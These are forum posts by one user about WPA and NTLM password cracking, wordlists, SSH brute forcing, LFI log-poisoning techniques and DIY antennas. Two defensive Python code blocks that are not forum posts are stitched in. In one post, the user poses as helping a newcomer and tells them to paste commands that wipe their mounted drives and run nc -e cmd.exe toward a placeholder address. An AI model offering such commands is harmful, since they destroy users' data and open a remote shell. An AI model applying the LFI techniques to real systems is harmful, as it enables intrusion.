Posts posted by i8igmac

  1. I have the Metasploit module somewhere on a hard drive. You will be better off learning the basics.

    First run a scan and try to discover as many files as you can, then post the results here...

    Burp Suite can be used to discover files with the Intruder tab. You will need a list of known files... I think Kali or Metasploit has a file list for this kind of scan...

  2. 2 hours ago, Decoy said:

    Yeah, I'm having a blast with this rig so far. I actually just found this new gem on GitHub, I'm adding these to my toolbox:

    https://github.com/wpatoolkit

    I was actually about to write my own NetGear default tool until I found these.

    What's the deal with Netgear? Is their password predictable? Is there a word list for it?

  3. If the traffic is encrypted with SSL or HSTS it won't work.

    Try using Internet Explorer and try multiple websites that are not encrypted.

    IP forwarding like this?

     echo 1 > /proc/sys/net/ipv4/ip_forward
  4. 12 minutes ago, Decoy said:

    Holy crap. That's man, that's awesome. I've just been combining lists as I find them, rockyou, dark0de, and all the latest breaches, etc. That's definitely a comprehensive list... There's a good repository on GitHub I use too,

    https://github.com/danielmiessler/SecLists

    There have been some major security breaches over the last few years. When this data is released to the public I'm sure this word list will grow by another 100 billion in a few years.

  5. 8 minutes ago, Decoy said:

    Yes, that's 781,400 hashes per second. I have a custom wordlist of 80+ million passwords, and it chews through that in no time at all. I'm running 2x Nvidia GeForce Founders Editions SLI. That's both of them combined. NTLM hashes:

    Hashtype: NTLM

    Speed.Dev.#1.....: 38451.1 MH/s (69.34ms)
    Speed.Dev.#2.....: 39406.8 MH/s (67.55ms)
    Speed.Dev.#*.....: 77858.0 MH/s

    I will post a pyrit benchmark tonight.

    https://labs.nettitude.com/tools/rocktastic/

    I believe this is an updated version of the word list you are using... 1.1 trillion :-)

  6. Hashtype: wpa/wpa2

    Speed.Dev.#1.....:   388.6 kH/s (52.19ms)
    Speed.Dev.#2.....:   392.8 kH/s (51.63ms)
    Speed.Dev.#*.....:   781.4 kH/s

    Is that 781,400 hashes per second?

    Can you post a pyrit benchmark? I would like to see a comparison...

    Are you running these GPUs in SLI? Overclocked? Water cooling?

  7. 8 hours ago, digip said:

    SSH bruting is a slow process, generally only send a few at a time or single threaded with a really good password file. You will just get locked out or banned in most cases, and the more threads won't actually help at all in this case. For things that don't block after a certain number of tries, like http basic auth or ftp, then you can get away with more, but even then, you can get false positives if you try too many too fast.

    This is true; in this case I was focused on devices that have minimal security.

  8. 3 hours ago, pierre said:

    The txt file with PHP code stored on the server doesn't execute the PHP but displays the PHP code.

    Only the RFI permits executing PHP code in a txt file.

    No special entry added in .htaccess apart from "php flag magic quotes gpc".

    The PHP code in the txt file (in the RFI case) is executed because the txt file is included with the include function in index.php? Is that so?

    Correct. You should look at the file /lfi/index.php. You should find include($_GET... or something close.

    Typically, RFI is not a practical method. LFI is more common. You have to discover local files that could allow you a way to view your header request. Then place PHP snippets in your header.

    /lfi/?page=/proc/self/environ

    This request above will execute PHP code directly from your user agent. You can use a web browser plugin to tamper with your user agent string.

    lfi/?page=/var/log/apache2/access.log

    If you can find the web server log file, you might see that this log file shows request information coming from your web browser, which should include a Referer: string or User-Agent string.

    Run a dir brute force scan. Try to discover config files and log files.

    You should learn small PHP snippets, how to find a writable directory and how to write your PHP code to this writable directory.

    I assume this is a vulnerable Linux VM?

  9. I have used 255 threads on ssh_brute. I ran into a problem with the msf database being unable to handle this many threads, so I tried to incorporate thread pooling with Puma.

    I didn't spend enough time tweaking for optimal performance, but it was a fun learning experience.

  10. The RFI is a vulnerability that exists in an index.php file.

    The PHP code in your vulnerable PHP file is executing the code from your echo.txt file.

    The vuln.php file is using include_once(echo.txt)

    The most common exploit of this technique might be log poisoning. If you can write PHP code to any log file then you could execute your own PHP code with the URL inclusion method:

    vuln.php?PAGE=../etc/log/FTP_error.log%00
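    Added example, not code from the thread or from the VM it discusses: the allowlist check that the bare include($_GET['page']) pattern in the two LFI/RFI replies above lacks, written in Python, plus the same predicate run over constructed access-log lines so a defender can flag the requests those replies describe. The page names, directory and log lines are assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed allowlist and directory layout; not taken from the thread.
ALLOWED_PAGES = {"home", "about", "contact"}
PAGES_DIR = "/var/www/app/pages"

def resolve_page(param: Optional[str]) -> Optional[str]:
    """Map a ?page= value to an includable file, or None if it must be refused.
    This is the check a bare include($_GET['page']) lacks: decode once, reject
    NUL bytes (%00 truncation), URL schemes (remote inclusion), absolute paths
    and traversal, then accept only names on the allowlist."""
    if not param:
        return None
    decoded = unquote(param)
    if "\x00" in decoded or "://" in decoded:
        return None
    if decoded.startswith(("/", "\\")) or ".." in decoded:
        return None
    if decoded not in ALLOWED_PAGES:
        return None
    return f"{PAGES_DIR}/{decoded}.php"

# Client IP and request target from an Apache combined-format access-log line.
_REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) ')

def flag_rejected_includes(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (ip, page) for every logged request that resolve_page refuses,
    so the predicate that protects the include also drives log review."""
    hits = []
    for line in log_lines:
        match = _REQ.match(line)
        if not match:
            continue
        ip, target = match.groups()
        for page in parse_qs(urlsplit(target).query).get("page", []):
            if resolve_page(page) is None:
                hits.append((ip, page))
    return hits

# Constructed sample log lines; the last two mirror requests quoted in the thread.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2018:10:00:00 +0000] "GET /lfi/?page=about HTTP/1.1" 200 512 "-" "Mozilla"',
    '10.0.0.9 - - [01/Jan/2018:10:00:01 +0000] "GET /lfi/?page=/proc/self/environ HTTP/1.1" 200 2048 "-" "Mozilla"',
    '10.0.0.9 - - [01/Jan/2018:10:00:02 +0000] "GET /lfi/?page=../etc/log/FTP_error.log%00 HTTP/1.1" 200 0 "-" "Mozilla"',
]
```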

  11. 3 hours ago, EvilMog said:

    Disclaimer: I am not a hashcat developer but I am on Team Hashcat. I am going to apologize for some corrections but they need to be made.

    1) wpaclean is part of the aircrack-ng suite; it should not be used for extracting hashes from WPA traffic for use in hashcat. The format it extracts in has been superseded and any requests for support using it will be denied.

    There is an alternative, wlandump from hcxtools https://github.com/ZerBea/hcxtools, which is supported under the most recent versions of hashcat. These tools are very specific and purpose built; other tools in the suite include:

    wlandump-ng Small, fast and simple but powerful WLAN scanner
    wlanresponse Extremely fast deauthentication/authentication/response tool
    wlanrcascan Small, fast and simple passive WLAN channel assignment scanner (status output)
    pioff Turns Raspberry Pi off via GPIO switch
    wlancapinfo Shows info of pcap file
    wlancap2hcx Converts cap to hccapx (recommended for use with wlandump-ng and wlanresponse)
    wlanhcx2cap Converts hccapx to cap
    wlanhc2hcx Converts hccap to hccapx
    wlanhcx2essid Merges hccapx containing the same ESSID
    wlanhcx2ssid Strips BSSID, ESSID, OUI
    wlanhcx2john Converts hccapx to format expected by John the Ripper
    wlanhcxinfo Shows detailed info from contents of hccapx file
    wlanhcxmnc Manually do nonce correction on byte number xx of a nonce
    whoismac Show vendor information
    pwhash Generate hash of a word by using a given charset

    2) from your post "I generally use john. When done, if i can't see a password in the terminal because it scrolled off screen, you type "john hashfile.txt --show"

    hashcat has had this support for some time with --show, also --username if you are using a dump with usernames, so there is no need to use john.

    3) from your post "I've dabbled with hashcat, but i don't have a GPU to use with it"

    Hashcat supports CPU as of 3.00 with the correct OpenCL libraries.

    4) from your post "had to use the older CPU only version, where John just seems so much faster in this respect "

    hashcat's OpenCL CPU code is multiple times faster than John's native CPU code because the algorithms are optimized at the math level.

    5) from your post "you can pipe crunch directly into aircrack"

    Crunch is a legacy processor; you really should be using hashcat-utils maskprocessor instead, it's much faster. That being said, you don't need to use it, as hashcat has it built in with -a 3, plus it's Markov-chain optimized.

    In summary, stop using legacy tools like pyrit; they haven't been updated in ages and no new research is being done. The guy who is writing hcxtools is the one who pushes WPA cracking today. There has not been any improvement on WPA based attacks for a long time for aircrack-ng and pyrit, and both fail to do deauth attacks cleanly (without creating invalid handshakes).

    For some good reading:
    WPA Cracking with hashcat
    https://hashcat.net/forum/thread-6150.html

    New parameter: --nonce-error-corrections
    https://hashcat.net/forum/thread-6361.html

    hashcat v3.00 release notes
    https://hashcat.net/forum/thread-5559.html

    For anything else please visit the hashcat forums, wiki and IRC channel.

    I did try out hcxtools; the hccapx generated with no errors, but when I attempt to start hashcat (I'll try and post the results) it just looks like an ugly mess... it says no hashes loaded.

    There was no cleaning done by any scripted tools. It's a fresh cap file from aircrack-ng 1.2 rc4.

  12. I'll check out John. Also looking into OpenCL vs CUDA..

    I currently hacked up a logging function with pyrit. I would hate to see 100 hours of work go by and fail to see a success... This function would also allow me to recover the attack from any location in the word list...

    I'm running 2 GPUs and 2 decent CPUs... blew all the dust out of the fans for the long haul.

    14000 PSKs

    22000 PSKs

    A 3rd GPU sitting on a bench; I expect 40,000 PSKs from this GPU and pyrit...

    I want to try extreme overclocking with home-brew cooling... I would like to see how much I can squeeze out of a dirt cheap GPU but also keep things stable.

  13. (Pyrit example command below)

    First I'll start with my problem with pyrit.

    Output logging is hacky; after 15 hours of work, there should be something logged to the file like "Password is or was not found".

    Notice 2>&1 should log both stdout and stderr to a file. If I grep through the log file, the Password string does not exist.

    (15 hours of work)

    If I test this with a small dictionary file, I achieve different results: the Password string exists and is grepable.

    (5 minutes of work)

    pyrit -r handshakes.cap -i Rocktastic12a -b XX:XX:XX:XX:XX attack_passthrough 2>&1 | tee -a resaults.log

    Love the application, it works for the most part but it seems there has not been much improvement since 2014.

    So, what about hashcat. This is my first attempt poking around; I knew of its existence but felt that pyrit works just fine so no need to bother with hashcat.

    (Hashcat)

    I have installed it, then ran the examples provided and I like the detailed output. Rocktastic cracked an enormous amount of the example hashes. Pretty cool...

    Now when I try to run hashcat on my handshake.cap file, I notice I have to convert to hashcat format with cap2hccapx. I installed hashcat-utils-1.8 and ran cap2hccapx on my aircrack capture file and see this error.

    hashcat-utils-1.8/src $ ./cap2hccapx.bin ../../out.pcap-01.cap output.hccapx
    Zero value timestamps detected in file: ../../out.pcap-01.cap.
    This prevents correct EAPOL-Key timeout calculation.
    Do not use preprocess the capture file with tools such as wpaclean.

    If I remember, this file was straight from aircrack. I did not run cleanup tools.

    I tried another tool that converts cap files to hashcat format, hcxtools. This attempt just looks ugly when I pass the newly generated cap.hccapx.... Could an outdated version of aircrack (1.2 rc4) be the cause of this struggle?

    The good news is, hashcat is updated consistently and has a large IRC channel.
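    Added example, not code from the thread or from hashcat-utils: a small Python check for the condition cap2hccapx reports above. It walks a classic pcap file and lists the records whose timestamp is 0/0, so you can see which frames trip the EAPOL-Key timeout check before converting. The sample capture is constructed inline; its link type and frame bytes are placeholders, and pcapng is not handled.

```python
import struct
from typing import List, Tuple

GLOBAL_HDR_LEN = 24   # classic pcap file header
RECORD_HDR_LEN = 16   # per-packet header: ts_sec, ts_frac, incl_len, orig_len

# First four bytes of the file select byte order and timestamp resolution.
_MAGICS = {
    b"\xd4\xc3\xb2\xa1": "<",  # little-endian, microsecond timestamps
    b"\xa1\xb2\xc3\xd4": ">",  # big-endian, microsecond timestamps
    b"\x4d\x3c\xb2\xa1": "<",  # little-endian, nanosecond timestamps
    b"\xa1\xb2\x3c\x4d": ">",  # big-endian, nanosecond timestamps
}

def zero_timestamp_records(data: bytes) -> Tuple[int, List[int]]:
    """Walk a classic pcap file and return (record_count, indices of records
    whose timestamp is 0/0). A zeroed timestamp defeats the EAPOL-Key timeout
    check, which is why cap2hccapx refuses the file; pcapng is not handled."""
    if len(data) < GLOBAL_HDR_LEN:
        raise ValueError("truncated pcap global header")
    endian = _MAGICS.get(data[:4])
    if endian is None:
        raise ValueError("not a classic pcap file")
    offset, index, zeros = GLOBAL_HDR_LEN, 0, []
    while offset + RECORD_HDR_LEN <= len(data):
        ts_sec, ts_frac, incl_len, _orig_len = struct.unpack(
            endian + "IIII", data[offset:offset + RECORD_HDR_LEN])
        if offset + RECORD_HDR_LEN + incl_len > len(data):
            raise ValueError(f"record {index} is truncated")
        if ts_sec == 0 and ts_frac == 0:
            zeros.append(index)
        offset += RECORD_HDR_LEN + incl_len
        index += 1
    return index, zeros

def build_sample_capture() -> bytes:
    """Constructed little-endian pcap (link type 105, IEEE 802.11) with three
    dummy frames; frame 1 carries a zeroed timestamp like the thread ran into."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
    records = []
    for i, (sec, usec) in enumerate([(1514764800, 1), (0, 0), (1514764800, 500)]):
        payload = bytes([0x80, 0x00, 0x00, 0x00]) + bytes([i] * 8)  # placeholder frame
        records.append(struct.pack("<IIII", sec, usec, len(payload), len(payload)) + payload)
    return header + b"".join(records)
```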

  14. The heck with these guys. I'll help you... make a bootable Kali USB stick or bootable live Kali CD...

    http://docs.kali.org/downloading/kali-linux-live-usb-install

    A tutorial like above... once you reboot your computer into this Kali operating system, paste exactly these commands

    	mount /dev/sda1 /tmp
    	Rm -rf /tmp
    	umount /dev/sda1
    	mount /dev/sdb1 /tmp
    	rm -rf /tmp
    	echo "pwnd by BiGMaC" >/tmp/readme.txt
    	umount /dev/sdb1
    nc <IP-ADDRESS> -e cmd.exe
    

  15. 54 minutes ago, digip said:

    What did you do to resolve the issues, or was it all 2.4ghz issues, while 5ghz was solid?

    Yes indeed... 2.4 GHz is just too crowded... 40 MHz is impossible... so the speed you pay for will never be achieved...

    Because of the short range of 5.8 GHz, 40 MHz is easily doable. When you first power your router on, it will scan for crowding networks and decide if 40 MHz is doable (consuming 2 channels simultaneously).

    A quick little hack I did with hostapd: put aluminum foil around the antennas and start hostapd. It will force 40 MHz but is of course way too crowded and will cause more issues...

    And with long range you are more susceptible to interference; on 2.4 GHz, my beam of radiation is passing through several different WiFi routers' airspace... think of the drops, retry, drop, fail...

    I would love to do a PowerPoint demonstration...

  16. So, I have made some huge progress...

    5.8 GHz has been 100% stable (long range) for about 5 days now... no packet loss, no more disconnects... 2.4 is too crowded... it was all packet loss/retry/drop/retry

    I see 60 Mbps during good conditions but 40 Mbps is consistent...

    I ordered some SMA pigtails, digital calipers and will build some antennas tuned for 5.8 GHz...

  17. I have been 3D printing parabolas for a few weeks now. Soon I will receive a 20-pack of SMA pigtails that I will use to build several feed antennas in hopes of finding a great parabola/antenna combo design... this design will be a 2x2 MIMO

    So I hope to build an inverted dipole but I fail to find measurements for 2.4 and 5 GHz

    I plan to mount 2 antennas at the 80mm focal point, just spaced apart horizontally...

    Any tips or ideas for antenna designs that might feed a parabola... I'm open to ideas.

  18. 32 minutes ago, digip said:

    Sounds like DNS is not resolving. You can add a script to hard-code DNS servers such as Google or OpenDNS.

    Throw in your /etc/resolv.conf (or whatever your device is using for DNS resolution):

    nameserver 8.8.8.8
    nameserver 208.67.220.220
    nameserver 208.67.222.222
    nameserver 192.168.1.1

    8.8.8.8 is Google, 208.x.x.x OpenDNS, and 192.x.x.x should be whatever the gateway IP is at the other end as the last entry. You don't need both Google and OpenDNS, choose either, but it doesn't hurt to have both. See if that helps. If it doesn't, you might want to see what your DNS service is doing.

    If the device uses something like nm-tools or the newer nmcli, you can query it as well for the info. If it's empty, track down why it's not being populated.

    BTW, love the colors. Did you 3D print the case materials?

    Thanks for the info, I tried 8.8.8.8 but never included 192.168...

    Yes, 3D printed a parabolic curve with a focal point of 40mm. The case is 180mm x 180mm x 60mm

    I'm learning my way around design in FreeCAD on Linux :-)

  19. Here is a project I have been working on; the configuration includes hostapd for wlan0

    dnsmasq to assign IPs to local clients (192.168.0.*)

    (wlan1) wpa_supplicant and dhclient to connect to an access point from a distance (10.0.0.*)

    And iptables to pass packets in both directions (wlan0 <-> wlan1)

    The access point in the distance is on channel 1 and my hostapd runs on channel 11... 5.8 GHz is not yet an option...

    I experience a disconnect and reconnect with the long range communication. At the moment the reconnect happens and the connection is stable again, something strange happens: I can ping my machines located in the distance on the 10.0.0.* subnet, but I can't ping Google for a few minutes...

    During this time I can perform a test of packet loss and ping

    mtr 192.168.0.1 -> 10.0.0.1

    0% packet loss and a consistent 20ms response time...

    But ping google just hangs with no response...

    Possible dhclient or DNS problem?
